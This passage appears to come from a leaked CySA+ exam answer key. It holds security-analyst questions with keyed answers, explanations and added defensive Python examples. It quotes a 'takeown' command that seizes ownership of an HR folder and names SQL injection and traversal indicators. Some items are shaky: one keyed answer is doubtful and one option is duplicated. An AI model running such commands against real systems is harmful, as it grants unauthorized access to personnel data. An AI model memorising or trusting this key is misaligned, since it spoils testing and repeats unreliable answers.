can plan more effectively for changes and minimize the risk of unintended consequences that could lead to
system failures.

F. Ensure that all assets are properly listed in the inventory management system:
Maintaining an accurate and comprehensive inventory of assets is fundamental in change management.
Knowing exactly what assets the organization possesses and their characteristics allows for better
planning and impact analysis when changes are made. This ensures that no critical component is
overlooked during the change process, reducing the risk of failures due to incomplete information.
Other Options:
A. Ensure users document system recovery plan prior to deployment: While documenting a system
recovery plan is important, it's more related to disaster recovery and business continuity planning than
directly reducing the impact of system failures due to changes.

B. Perform a full system-level backup following the change: While backups are essential, they are
generally a reactive measure to recover from a failure, rather than a proactive measure to reduce the
impact of system failures in the first place.

C. Leverage an audit tool to identify changes that are being made: While using an audit tool is helpful for
tracking changes and ensuring compliance, it is not directly linked to reducing the impact of system failures
due to changes.

E. Require diagrams to be completed for all critical systems: While having diagrams of critical systems is
useful for understanding and managing them, it is not a direct method for reducing the impact of system
failures due to changes.
Diagrams are more about documentation and understanding rather than proactive change management.

QUESTION 108
During normal security monitoring activities, the following activity was observed:

cd C:\Users\Documents\HR\Employees
takeown/f .*

SUCCESS:

Which of the following best describes the potentially malicious activity observed?

A. Registry changes or anomalies
B. Data exfiltration
C. Unauthorized privileges
D. File configuration changes

Correct Answer: C
Explanation

Explanation/Reference:
Explanation: The takeown command takes ownership of a file or folder to which the current user or group was previously denied access. The activity observed shows someone taking ownership of the contents of C:\Users\Documents\HR\Employees, a directory likely to hold sensitive or confidential personnel data. That is a sign of unauthorized privileges: the user or group may have no legitimate right or need to access those files, and as owner they can now grant themselves full control, then read, modify or delete the data, affecting its confidentiality, integrity and availability. Nothing in the output shows registry changes, data leaving the host, or changes to file contents, which rules out the other options.

QUESTION 109
An analyst investigated a website and produced the following:
Which of the following syntaxes did the analyst use to discover the application versions on this vulnerable
website?

A. nmap -sS -T4 -F insecure.org
B. nmap -o insecure.org
C. nmap -sV -T4 -F insecure.org
D. nmap -A insecure.org

Correct Answer: C
Explanation

Explanation/Reference:
Explanation: The -sV option enables service and version detection: nmap probes each open port to identify the application and its version, which is what populates the VERSION column of the output. -T4 sets a faster timing template and -F scans only the most common ports. -sS is a SYN scan that reports open ports without version information; -A bundles OS detection, version detection, script scanning and traceroute, but it is not the syntax shown; and -o by itself is not a valid option (output is selected with -oN, -oX or -oG, and OS detection is -O, neither of which reports application versions).
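
An added example tying together the scan questions in this part (the unsecured-services audit, the "Host is up" output and the -sV syntax): a parser for nmap's normal output that flags cleartext services and services whose configuration needs review. It is not code from the exam or from the Nmap project. The scan report it reads is constructed for the example, as are the service classifications and the recommendations attached to them.

```python
import re

# Constructed nmap -sV report for the example (not the output from any question
# above, which is not reproduced in this text). Host, banners and versions are made up.
SAMPLE_NMAP = """\
Starting Nmap 7.94 ( https://nmap.org )
Nmap scan report for 10.0.0.12
Host is up (0.0021s latency).
Not shown: 994 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           vsftpd 3.0.3
22/tcp   open  ssh           OpenSSH 8.9p1 (protocol 2.0)
23/tcp   open  telnet        Linux telnetd
636/tcp  open  ssl/ldap
1723/tcp open  pptp
3389/tcp open  ms-wbt-server Microsoft Terminal Services
"""

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")

# Services that carry credentials or data in cleartext, with the replacement
# a practitioner would propose. (Assumed classification for the example.)
CLEARTEXT = {
    "ftp": "SFTP or FTPS",
    "telnet": "SSH",
    "http": "HTTPS",
    "pop3": "POP3 over TLS",
    "imap": "IMAP over TLS",
    "smtp": "SMTP with STARTTLS or SMTPS",
    "ldap": "LDAPS or LDAP with StartTLS",
}
# Encrypted or authenticated services that still warrant a configuration check.
REVIEW = {
    "ssl/ldap": "verify the certificate chain, expiry and client-side validation",
    "pptp": "PPTP authentication (MS-CHAPv2) is broken; move to IPsec/IKEv2 or another VPN",
    "ms-wbt-server": "RDP exposed; restrict source addresses and require NLA and MFA",
}


def parse_nmap(text):
    """Pull host state and the open-port table out of nmap's normal output."""
    report = {"host_up": False, "ports": []}
    for line in text.splitlines():
        if line.startswith("Host is up"):
            report["host_up"] = True
            continue
        match = PORT_LINE.match(line)
        if match:
            port, proto, state, service, version = match.groups()
            report["ports"].append({
                "port": int(port), "proto": proto, "state": state,
                "service": service, "version": version or "",
            })
    return report


def flag_unsecured(report):
    """Findings as (port, service, category, recommendation), cleartext first."""
    findings = []
    for entry in report["ports"]:
        if entry["state"] != "open":
            continue
        service = entry["service"]
        if service in CLEARTEXT:
            findings.append((entry["port"], service, "cleartext",
                             "replace with " + CLEARTEXT[service]))
        elif service in REVIEW:
            findings.append((entry["port"], service, "review", REVIEW[service]))
    findings.sort(key=lambda f: (f[2] != "cleartext", f[0]))
    return findings


if __name__ == "__main__":
    parsed = parse_nmap(SAMPLE_NMAP)
    print("host up:", parsed["host_up"])
    for finding in flag_unsecured(parsed):
        print(finding)
```

The VERSION column only exists because the scan was run with -sV; without it the parser still works, but the version field is empty and the banner-based checks a vulnerability scanner would layer on top have nothing to match against.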

QUESTION 110
The Chief Information Security Officer for an organization recently received approval to install a new EDR
solution. Following the installation, the number of alerts that require remediation by an analyst has tripled.
Which of the following should the organization utilize to best centralize the workload for the internal
security team? (Select two).

A. SOAR
B. SIEM
C. MSP
D. NGFW
E. XDR
F. DLP

Correct Answer: AB
Explanation

Explanation/Reference:
Explanation: SOAR (Security Orchestration, Automation and Response) and SIEM (Security Information
and Event Management) are solutions that can help centralize the workload for the internal security team
by collecting, correlating, and analyzing alerts from different sources, such as EDR. SOAR can also
automate and streamline incident response workflows, while SIEM can provide dashboards and reports for
security monitoring and compliance. References: What is EDR? Endpoint Detection & Response, How
Does the Cyber Kill Chain Protect Against Attacks?; What is EDR Solution?, EDR solutions secure diverse
endpoints through central monitoring

QUESTION 111
A security analyst would like to integrate two different SaaS-based security tools so that one tool can notify
the other in the event a threat is detected. Which of the following should the analyst utilize to best
accomplish this goal?

A. SMB share
B. API endpoint
C. SMTP notification
D. SNMP trap

Correct Answer: B
Explanation

Explanation/Reference:
Explanation: An API endpoint is a point of entry for a communication between two different SaaS-based
security tools. It allows one tool to send requests and receive responses from the other tool using a
common interface. An API endpoint can be used to notify the other tool in the event a threat is detected
and trigger an appropriate action. SMB share, SMTP notification, and SNMP trap are not suitable for SaaS
integration security, as they are either network protocols or email services that do not provide a direct and
secure communication between two different SaaS tools. References: Top 10 Best SaaS Security Tools -
2023, What is SaaS Security? A Guide to Everything SaaS Security, 6 Key Considerations for SaaS
Integration Security | Prismatic, Introducing Security for Interconnected SaaS - Palo Alto Networks

QUESTION 112
An organization needs to bring in data collection and aggregation from various endpoints. Which of the
following is the best tool to deploy to help analysts gather this data?

A. DLP
B. NAC
C. EDR
D. NIDS

Correct Answer: C
Explanation

Explanation/Reference:
Explanation: EDR stands for Endpoint Detection and Response, which is a tool that collects and
aggregates data from various endpoints, such as laptops, servers, or mobile devices. EDR helps analysts
monitor, detect, and respond to threats and incidents on the endpoints. EDR is more suitable than DLP
(Data Loss Prevention), NAC (Network Access Control), or NIDS (Network Intrusion Detection System) for
data collection and aggregation from endpoints. References: CompTIA CySA+ CS0-003 Certification Study
Guide, Chapter 2: Software and Systems Security, page 75; What Is Data Aggregation? (Examples +
Tools), Section: Data Aggregation: How It Works, Subsection: 1. Data Collection.

QUESTION 113
A security analyst reviews the following extract of a vulnerability scan that was performed against the web
server:
Which of the following recommendations should the security analyst provide to harden the web server?

A. Remove the version information on http-server-header.
B. Disable tcp_wrappers.
C. Delete the /wp-login.php folder.
D. Close port 22.

Correct Answer: A
Explanation

Explanation/Reference:
Explanation: The vulnerability scan shows that the version information is visible in the http-server-header,
which can be exploited by attackers to identify vulnerabilities specific to that version. Removing or
obfuscating this information can enhance security. References: CompTIA CySA+ CS0-003 Certification
Study Guide, Chapter 4: Vulnerability Management, page 172; CompTIA CySA+ Study Guide: Exam CS0-
003, 3rd Edition, Chapter 5: Vulnerability Management, page 223.

QUESTION 114
Which of the following best explains the importance of communicating with staff regarding the official public
communication plan related to incidents impacting the organization?

A. To establish what information is allowed to be released by designated employees
B. To designate an external public relations firm to represent the organization
C. To ensure that all news media outlets are informed at the same time
D. To define how each employee will be contacted after an event occurs

Correct Answer: A
Explanation

Explanation/Reference:
Explanation: Communicating with staff about the official public communication plan is important to avoid
unauthorized or inaccurate disclosure of information that could harm the organization's reputation, security,
or legal obligations. It also helps to ensure consistency and clarity of the messages delivered to the public
and other stakeholders. https://resources.sei.cmu.edu/asset_files/Handbook/2021_002_001_651819.pdf

QUESTION 115
Which of the following stakeholders are most likely to receive a vulnerability scan report? (Select two).

A. Executive management
B. Law enforcement
C. Marketing
D. Legal
E. Product owner
F. Systems administration

Correct Answer: AF
Explanation

Explanation/Reference:
Explanation: Executive management and systems administration are the most likely stakeholders to
receive a vulnerability scan report because they are responsible for overseeing the security posture and
remediation efforts of the organization. Law enforcement, marketing, legal, and product owner are less
likely to be involved in the vulnerability management process or need access to the scan results.
References:
Cybersecurity Analyst+ - CompTIA, How To Write a Vulnerability Assessment Report | EC- Council,
Driving Stakeholder Alignment in Vulnerability Management - LogicGate

QUESTION 116
The Chief Information Security Officer (CISO) of a large management firm has selected a cybersecurity
framework that will help the organization demonstrate its investment in tools and systems to protect its
data. Which of the following did the CISO most likely select?

A. PCI DSS
B. COBIT
C. ISO 27001
D. ITIL

Correct Answer: C
Explanation

Explanation/Reference:
Explanation: ISO 27001 is an international standard that establishes a framework for implementing,
maintaining, and improving an information security management system (ISMS). It helps organizations
demonstrate their commitment to protecting their data and complying with various regulations and best
practices. The other options are not relevant for this purpose: PCI DSS is a standard that focuses on
protecting payment card data; COBIT is a framework that provides guidance on governance and
management of enterprise IT; ITIL is a framework that provides guidance on service management and
delivery. References: According to the CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition, one of
the objectives for the exam is to "use appropriate tools and methods to manage, prioritize and respond to
attacks and vulnerabilities". The book also covers the usage and syntax of various cybersecurity
frameworks and standards, such as ISO 27001, PCI DSS, COBIT, and ITIL, in chapter 1. Specifically, it
explains the meaning and function of each framework and standard, such as ISO 27001, which provides a
comprehensive approach to information security management (page 29). Therefore, this is a reliable
source to verify the answer to the question.

QUESTION 117
A security analyst needs to secure digital evidence related to an incident. The security analyst must ensure
that the accuracy of the data cannot be repudiated. Which of the following should be implemented?

A. Offline storage
B. Evidence collection
C. Integrity validation
D. Legal hold

Correct Answer: C
Explanation

Explanation/Reference:
Integrity validation is the process of ensuring that the digital evidence has not been altered or tampered
with during collection, acquisition, preservation, or analysis. It usually involves generating and verifying
cryptographic hashes of the evidence, such as MD5 or SHA-1. Integrity validation is essential for
maintaining the accuracy and admissibility of the digital evidence in court.
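
Added example (my own code, not from the study guides cited on this page): a hash manifest for an
evidence directory, with a verifier that reports modified, missing and unexpected files. The demo() function
builds a constructed evidence set in a temporary directory, verifies it, then alters one byte of the memory
image, deletes a log and drops in a stray file before verifying again. SHA-256 is the primary digest here
rather than the MD5/SHA-1 the explanation mentions; SHA-1 is kept only so the manifest can be matched
against older tool output, not as the sole integrity check.

```python
import hashlib
import tempfile
from pathlib import Path

# SHA-256 is the digest that actually proves integrity; SHA-1 is retained only for
# comparison with legacy tool output and must not be relied on by itself.
HASH_ALGORITHMS = ("sha256", "sha1")


def hash_file(path, algorithm="sha256", chunk_size=1 << 20) -> str:
    """Hash a file in chunks so large images (memory dumps, disk images) fit in memory."""
    digest = hashlib.new(algorithm)
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(evidence_dir) -> dict:
    """Hash every file under evidence_dir; keys are paths relative to that directory."""
    root = Path(evidence_dir)
    manifest = {}
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        rel = path.relative_to(root).as_posix()
        manifest[rel] = {alg: hash_file(path, alg) for alg in HASH_ALGORITHMS}
    return manifest


def verify_manifest(evidence_dir, manifest) -> dict:
    """Compare the directory against a manifest taken earlier.

    Returns {'modified': [...], 'missing': [...], 'unexpected': [...]}; the evidence
    set is intact only when all three lists are empty.
    """
    root = Path(evidence_dir)
    result = {"modified": [], "missing": [], "unexpected": []}
    present = {p.relative_to(root).as_posix() for p in root.rglob("*") if p.is_file()}
    for rel, digests in manifest.items():
        if rel not in present:
            result["missing"].append(rel)
            continue
        if any(hash_file(root / rel, alg) != expected for alg, expected in digests.items()):
            result["modified"].append(rel)
    result["unexpected"] = sorted(present - manifest.keys())
    return result


def demo() -> tuple:
    """Constructed evidence set (hypothetical files): verify clean, then after tampering."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "memory.dmp").write_bytes(b"\x00" * 4096)
        (root / "logs").mkdir()
        (root / "logs" / "auth.log").write_text(
            "Jan  1 00:00:01 host sshd[1]: Accepted publickey for analyst\n")  # constructed line
        manifest = build_manifest(root)
        clean = verify_manifest(root, manifest)

        # Simulated tampering: one byte changed, one file removed, one file added.
        with open(root / "memory.dmp", "r+b") as fh:
            fh.seek(100)
            fh.write(b"\x01")
        (root / "logs" / "auth.log").unlink()
        (root / "notes.txt").write_text("added after acquisition\n")
        tampered = verify_manifest(root, manifest)
        return clean, tampered


if __name__ == "__main__":
    before, after = demo()
    print("clean:", before)
    print("tampered:", after)
```

In practice the manifest is generated at acquisition, signed or stored separately from the evidence, and
re-verified at each hand-off so that any mismatch can be tied to a point in the chain of custody.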

QUESTION 118
A security analyst has prepared a vulnerability scan that contains all of the company's functional subnets.
During the initial scan, users reported that network printers began to print pages that contained unreadable
text and icons.

Which of the following should the analyst do to ensure this behavior does not occur during subsequent
vulnerability scans?

A. Perform non-credentialed scans.
B. Ignore embedded web server ports.
C. Create a tailored scan for the printer subnet.
D. Increase the threshold length of the scan timeout.

Correct Answer: C
Explanation

Explanation/Reference:
Explanation: The best way to prevent network printers from printing pages during a vulnerability scan is to
create a tailored scan for the printer subnet that excludes the ports and services that trigger the printing
behavior. The other options are not effective for this purpose: performing non-credentialed scans may not
reduce the impact on the printers; ignoring embedded web server ports may not cover all the possible
ports that cause printing; increasing the threshold length of the scan timeout may not prevent the printing
from occurring.
References: According to the CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition, one of the
objectives for the exam is to "use appropriate tools and methods to manage, prioritize and respond to
attacks and vulnerabilities". The book also covers the usage and syntax of vulnerability scanning tools,
such as Nessus, Nmap, and Qualys, in chapter 4. Specifically, it explains the meaning and function of each
component in vulnerability scanning, such as credentialed vs. non-credentialed scans, port scanning, and
scan scheduling (pages 149-160). It also discusses the common issues and challenges of vulnerability
scanning, such as network disruptions, false positives, and scan scope (pages 161-162).
Therefore, this is a reliable source to verify the answer to the question.

QUESTION 119
An email hosting provider added a new data center with new public IP addresses. Which of the following
most likely needs to be updated to ensure emails from the new data center do not get blocked by spam
filters?

A. DKIM
B. SPF
C. SMTP
D. DMARC

Correct Answer: B
Explanation

Explanation/Reference:
Explanation: SPF (Sender Policy Framework) is a DNS TXT record that lists authorized sending IP
addresses for a given domain. If an email hosting provider added a new data center with new public IP
addresses, the SPF record needs to be updated to include those new IP addresses, otherwise the emails
from the new data center may fail SPF checks and get blocked by spam filters. References: 1: Use
DMARC to validate email, setup steps; 2: How to set up SPF, DKIM and DMARC: other mail & hosting
providers; 3: Set up SPF, DKIM, or DMARC records for my hosting email
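
Added example, not taken from the page or its references: a small Python evaluator for the ip4/ip6/all
terms of an SPF record, plus a helper that inserts a new sending range before the all mechanism, which
is the change the explanation above calls for. The record and the 203.0.113.0/24 and 198.51.100.0/24
ranges are constructed documentation addresses, and the function names are mine. The include, a and mx
mechanisms are deliberately not resolved, since that needs DNS; offline they simply do not match.

```python
import ipaddress

# SPF result produced when a mechanism with the given qualifier matches (RFC 7208, 4.6.2).
QUALIFIER_RESULT = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}

# Constructed records: the provider's existing SPF and the new data center's range.
OLD_RECORD = "v=spf1 ip4:203.0.113.0/24 include:_spf.example.net -all"
NEW_DATA_CENTER = "198.51.100.0/24"


def parse_spf(record: str) -> list:
    """Return the record's terms as (qualifier, mechanism, argument) tuples.

    Modifiers such as redirect= and exp= are skipped; include/a/mx/exists/ptr are
    returned but not resolved, because evaluating them requires DNS lookups.
    """
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        raise ValueError("not an SPF record (missing v=spf1)")
    parsed = []
    for term in terms[1:]:
        if "=" in term:
            continue
        qualifier = "+"
        if term[0] in QUALIFIER_RESULT:
            qualifier, term = term[0], term[1:]
        mechanism, _, argument = term.partition(":")
        parsed.append((qualifier, mechanism.lower(), argument))
    return parsed


def spf_check(record: str, sender_ip: str) -> str:
    """Evaluate ip4/ip6/all terms for a sending IP and return the SPF result string."""
    ip = ipaddress.ip_address(sender_ip)
    for qualifier, mechanism, argument in parse_spf(record):
        if mechanism == "all":
            return QUALIFIER_RESULT[qualifier]
        if mechanism in ("ip4", "ip6"):
            network = ipaddress.ip_network(argument, strict=False)
            if ip.version == network.version and ip in network:
                return QUALIFIER_RESULT[qualifier]
        # include/a/mx/exists/ptr would need DNS; treated as non-matching here.
    return "neutral"  # RFC 7208: nothing matched and no 'all' term present


def authorize_networks(record: str, networks: list) -> str:
    """Return the record with ip4:/ip6: terms for the new ranges inserted before 'all'.

    'all' must stay last: receivers ignore anything that follows it, so appending
    the new range after '-all' would leave the new data center unauthorized.
    """
    terms = record.split()
    new_terms = []
    for net in networks:
        parsed = ipaddress.ip_network(net, strict=False)
        term = f"ip{parsed.version}:{parsed.with_prefixlen}"
        if term not in terms:
            new_terms.append(term)
    all_index = next((i for i, t in enumerate(terms)
                      if t.lstrip("+-~?").lower() == "all"), len(terms))
    return " ".join(terms[:all_index] + new_terms + terms[all_index:])


if __name__ == "__main__":
    sender = "198.51.100.25"  # constructed address in the new data center
    print("before:", spf_check(OLD_RECORD, sender))
    updated = authorize_networks(OLD_RECORD, [NEW_DATA_CENTER])
    print(updated)
    print("after: ", spf_check(updated, sender))
```

When the real record is updated, keep in mind that include, a, mx, ptr, exists and redirect each count
toward the ten DNS lookups RFC 7208 permits per evaluation; adding ranges as ip4/ip6 terms, as above,
does not consume any of them.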

QUESTION 120
During a scan of a web server in the perimeter network, a vulnerability was identified that could be
exploited over port 3389. The web server is protected by a WAF. Which of the following best represents
the change to overall risk associated with this vulnerability?

A. The risk would not change because network firewalls are in use.
B. The risk would decrease because RDP is blocked by the firewall.
C. The risk would decrease because a web application firewall is in place.
D. The risk would increase because the host is external facing.

Correct Answer: B
Explanation

Explanation/Reference:
Explanation: Port 3389 is commonly used by Remote Desktop Protocol (RDP), which is a service that
allows remote access to a system. A vulnerability on this port could allow an attacker to compromise the
web server or use it as a pivot point to access other systems. However, if the firewall blocks this port, the
risk of exploitation is reduced. References: CompTIA CySA+ CS0-003 Certification Study Guide, Chapter
2: Software and Systems Security, page 67; CompTIA CySA + Study Guide: Exam CS0-003, 3rd Edition,
Chapter 3: Software and Systems Security, page 103.

QUESTION 121
A security analyst has identified a new malware file that has impacted the organization. The malware is
polymorphic and has built-in conditional triggers that require a connection to the internet. The CPU has an
idle process of at least 70%. Which of the following best describes how the security analyst can effectively
review the malware without compromising the organization's network?

A. Utilize an RDP session on an unused workstation to evaluate the malware.
B. Disconnect and utilize an existing infected asset off the network.
C. Create a virtual host for testing on the security analyst workstation.
D. Subscribe to an online service to create a sandbox environment.

Correct Answer: D
Explanation

Explanation/Reference:
Explanation: A sandbox environment is a safe and isolated way to analyze malware without affecting the
organization's network. An online service can provide a sandbox environment without requiring the security
analyst to set up a virtual host or use an RDP session. Disconnecting and using an existing infected asset
is risky and may not provide accurate results. References: Malware Analysis: Steps & Examples, Dynamic
Analysis

QUESTION 122
An analyst reviews a recent government alert on new zero-day threats and finds the following CVE metrics
for the most critical of the vulnerabilities:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:W/RC:R

Which of the following represents the exploit code maturity of this critical vulnerability?

A. E:U
B. S:C
C. RC:R
D. AV:N
E. AC:L

Correct Answer: A
Explanation

Explanation/Reference:
The exploit code maturity of a vulnerability is indicated by the E metric in the CVSS temporal score. The
value of U means that no exploit code is available or unknown. The other options are not related to the
exploit code maturity, but to other aspects of the vulnerability, such as attack vector, scope, availability,
and complexity.

QUESTION 123
A laptop that is company owned and managed is suspected to have malware. The company implemented
centralized security logging. Which of the following log sources will confirm the malware infection?

A. XDR logs
B. Firewall logs
C. IDS logs
D. MFA logs

Correct Answer: A
Explanation

Explanation/Reference:
Explanation: XDR logs will confirm the malware infection because XDR is a system that collects and
analyzes data from multiple sources, such as endpoints, networks, cloud applications, and email security,
to detect and respond to advanced threats. XDR can provide a comprehensive view of the attack chain
and the context of the malware infection. Firewall logs, IDS logs, and MFA logs are not sufficient to confirm
the malware infection, as they only provide partial or indirect information about the network traffic, intrusion
attempts, or user authentication. References: Cybersecurity Analyst+ - CompTIA, XDR: definition and
benefits for MSPs | WatchGuard Blog, Extended detection and response - Wikipedia

QUESTION 124
A security analyst is trying to validate the results of a web application scan with Burp Suite.
The security analyst performs the following:

Which of the following vulnerabilities is the security analyst trying to validate?

A. SQL injection
B. LFI
C. XSS
D. CSRF

Correct Answer: B
Explanation

Explanation/Reference:
Explanation: The security analyst is validating a Local File Inclusion (LFI) vulnerability, as indicated by the
"/.../.../.../" in the GET request which is a common indicator of directory traversal attempts associated with
LFI. The other options are not relevant for this purpose:
SQL injection involves injecting malicious SQL statements into a database query; XSS involves injecting
malicious scripts into a web page; CSRF involves tricking a user into performing an unwanted action on a
web application. References:
According to the CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition, one of the objectives for the
exam is to "use appropriate tools and methods to manage, prioritize and respond to attacks and
vulnerabilities". The book also covers the usage and syntax of Burp Suite, a tool used for testing web
application security, in chapter 6. Specifically, it explains the meaning and function of each component in
Burp Suite, such as Repeater, which allows the security analyst to modify and resend individual requests
(page 239). Therefore, this is a reliable source to verify the answer to the question.

QUESTION 125
Which of the following is the most appropriate action for a security analyst to take to effectively identify the
most security risks associated with a locally hosted server?

A. Run the operating system update tool to apply patches that are missing.
B. Contract an external penetration tester to attempt a brute-force attack.
C. Download a vendor support agent to validate drivers that are installed.
D. Execute a vulnerability scan against the target host.

Correct Answer: D
Explanation

Explanation/Reference:
A vulnerability scan is a process of identifying and assessing the security weaknesses of a system or
network. A vulnerability scan can help a security analyst to effectively identify the most security risks
associated with a locally hosted server, such as missing patches, misconfigurations, outdated software, or
exposed services. A vulnerability scan can also provide recommendations on how to remediate the
identified vulnerabilities and improve the security posture of the server. References: 1: What is a
Vulnerability Scan? | Definition and Examples; 2: Securing a server: risks, challenges and best practices -
Vaadata

QUESTION 126
Which of the following threat actors is most likely to target a company due to its questionable
environmental policies?

A. Hacktivist
B. Organized crime
C. Nation-state
D. Lone wolf

Correct Answer: A
Explanation

Explanation/Reference:
Explanation: Hacktivists are threat actors who use cyberattacks to promote a social or political cause, such
as environmentalism, human rights, or democracy. They may target companies that they perceive as
violating their values or harming the public interest. Hacktivists often use techniques such as defacing
websites, launching denial-of-service attacks, or leaking sensitive data to expose or embarrass their
targets. References: An introduction to the cyber threat environment, page 3; What is a Threat Actor?
Types & Examples of Cyber Threat Actors, section 2.

QUESTION 127
The SOC received a threat intelligence notification indicating that an employee's credentials were found on
the dark web. The user's web and log-in activities were reviewed for malicious or anomalous connections,
data uploads/downloads, and exploits. A review of the controls confirmed multifactor authentication was
enabled. Which of the following should be done first to mitigate impact to the business networks and
assets?

A. Perform a forced password reset.
B. Communicate the compromised credentials to the user.
C. Perform an ad hoc AV scan on the user's laptop.
D. Review and ensure privileges assigned to the user's account reflect least privilege.
E. Lower the thresholds for SOC alerting of suspected malicious activity.

Correct Answer: A
Explanation

Explanation/Reference:
Explanation: The first and most urgent step to mitigate the impact of compromised credentials on the dark
web is to perform a forced password reset for the affected user. This will prevent the cybercriminals from
using the stolen credentials to access the company's network and systems. Multifactor authentication is a
good security measure, but it is not foolproof and can be bypassed by sophisticated attackers. Therefore,
changing the password as soon as possible is the best practice to reduce the risk of a data breach or other
cyber attack. References: 1: How to monitor the dark web for compromised employee credentials; 2:
How to prevent corporate credentials ending up on the dark web; 3: Data Breach Prevention: Identifying
Leaked Credentials on the Dark Web

QUESTION 128
While reviewing web server logs, a security analyst discovers the following suspicious line:

Which of the following is being attempted?

A. Remote file inclusion
B. Command injection
C. Server-side request forgery
D. Reverse shell

Correct Answer: B
Explanation

Explanation/Reference:
Explanation: The suspicious line in the web server logs is an attempt to execute a command on the server,
indicating a command injection attack. References: CompTIA CySA+ Study Guide: Exam CS0-003, 3rd
Edition, Chapter 5, page 197; CompTIA CySA+ CS0-003 Certification Study Guide, Chapter 5, page 205.

QUESTION 129
A network analyst notices a long spike in traffic on port 1433 between two IP addresses on opposite sides
of a WAN connection. Which of the following is the most likely cause?

A. A local red team member is enumerating the local RFC1918 segment to enumerate hosts.
B. A threat actor has a foothold on the network and is sending out control beacons.
C. An administrator executed a new database replication process without notifying the SOC.
D. An insider threat actor is running Responder on the local segment, creating traffic replication.

Correct Answer: C
Explanation

Explanation/Reference:
Explanation: Port 1433 is commonly used by Microsoft SQL Server, which is a database management
system. A spike in traffic on this port between two IP addresses on opposite sides of a WAN connection
could indicate a database replication process, which is a way of copying and distributing data from one
database server to another. This could be a legitimate activity performed by an administrator, but it should
be communicated to the security operations center (SOC) to avoid confusion and false alarms.
References: CompTIA CySA+ CS0-003 Certification Study Guide, Chapter 3: Security Operations, page
107; CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition, Chapter 4: Security Operations, page 153.

QUESTION 130
Several vulnerability scan reports have indicated runtime errors as the code is executing. The dashboard
that lists the errors has a command-line interface for developers to check for vulnerabilities. Which of the
following will enable a developer to correct this issue? (Select two).

A. Performing dynamic application security testing
B. Reviewing the code
C. Fuzzing the application
D. Debugging the code
E. Implementing a coding standard
F. Implementing IDS
F. Implementing IDS

Correct Answer: BD
Explanation

Explanation/Reference:
Reviewing the code and debugging the code are two methods that can help a developer identify and fix
runtime errors in the code. Reviewing the code involves checking the syntax, logic, and structure of the
code for any errors or inconsistencies. Debugging the code involves running the code in a controlled
environment and using tools such as breakpoints, watches, and logs to monitor the execution and find the
source of errors. Both methods can help improve the quality and security of the code.

QUESTION 131
A penetration tester is conducting a test on an organization's software development website. The
penetration tester sends the following request to the web interface:

Which of the following exploits is most likely being attempted?

A. SQL injection
B. Local file inclusion
C. Cross-site scripting
D. Directory traversal

Correct Answer: A
Explanation

Explanation/Reference:
Explanation: SQL injection is a type of attack that injects malicious SQL statements into a web application's
input fields or parameters, in order to manipulate or access the underlying database. The request shown in
the image contains an SQL injection attempt, as indicated by the "UNION SELECT" statement, which is
used to combine the results of two or more queries. The attacker is trying to extract information from the
database by appending the malicious query to the original one.

QUESTION 132
A vulnerability analyst is writing a report documenting the newest, most critical vulnerabilities identified in
the past month. Which of the following public MITRE repositories would be best to review?

A. Cyber Threat Intelligence
B. Common Vulnerabilities and Exposures
C. Cyber Analytics Repository
D. ATT&CK

Correct Answer: B
Explanation

Explanation/Reference:
The Common Vulnerabilities and Exposures (CVE) is a public repository of standardized identifiers and
descriptions for common cybersecurity vulnerabilities. It helps security analysts to identify, prioritize, and
report on the most critical vulnerabilities in their systems and applications. The other options are not
relevant for this purpose: Cyber Threat Intelligence (CTI) is a collection of information and analysis on
current and emerging cyber threats; Cyber Analytics Repository (CAR) is a knowledge base of analytics
developed by MITRE based on the ATT&CK adversary model; ATT&CK is a globally-accessible
knowledge base of adversary tactics and techniques based on real-world observations. References:
According to the CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition, one of the objectives for the
exam is to "use appropriate tools and methods to manage, prioritize and respond to attacks and
vulnerabilities". The book also covers the usage and syntax of various cybersecurity frameworks and
standards, such as CVE, CTI, CAR, and ATT&CK, in chapter 1. Specifically, it explains the meaning and
function of each framework and standard, such as CVE, which provides a common language for describing
and sharing information about vulnerabilities (page 28). Therefore, this is a reliable source to verify the
answer to the question.

QUESTION 133
Following an attack, an analyst needs to provide a summary of the event to the Chief Information Security
Officer. The summary needs to include the who-what-when information and evaluate the effectiveness of
the plans in place. Which of the following incident management life cycle processes does this describe?

A. Business continuity plan
B. Lessons learned
C. Forensic analysis
D. Incident response plan

Correct Answer: B
Explanation

Explanation/Reference:
The lessons learned process is the final stage of the incident management life cycle, where the incident
team reviews the incident and evaluates the effectiveness of the response and the plans in place. The
lessons learned report should include the who-what-when information and any recommendations for
improvement. References: 1: What is incident management? Steps, tips, and best practices; 2: 5 Steps
of the Incident Management Lifecycle | RSI Security; 3: Navigating the Incident Response Life Cycle: A
Comprehensive Guide

Exam F

QUESTION 1
SIMULATION

Approximately 100 employees at your company have received a phishing email. As a security analyst, you
have been tasked with handling this situation.
Review the information provided and determine the following:

1. How many employees clicked on the link in the phishing email?

2. On how many workstations was the malware installed?

3. What is the executable file name of the malware?

Correct Answer: Answer: see the answer in explanation for this task.
Explanation
Explanation/Reference:
1. How many employees clicked on the link in the phishing email? According to the email server logs, 25
employees clicked on the link in the phishing email.
2. On how many workstations was the malware installed? According to the file server logs, the malware
was installed on 15 workstations.
3. What is the executable file name of the malware? The executable file name of the malware is
svchost.EXE.
Answers
1. 25
2. 15
3. svchost.EXE

QUESTION 2
SIMULATION

You are a penetration tester who is reviewing the system hardening guidelines for a company. Hardening
guidelines indicate the following:

There must be one primary server or service per device.
Only default ports should be used.
Non-secure protocols should be disabled.
The corporate internet presence should be placed in a protected subnet.

Instructions:

Using the available tools, discover devices on the corporate network and the services running on these
devices.
You must determine:

The IP address of each device
The primary server or service on each device
The protocols that should be disabled based on the hardening guidelines

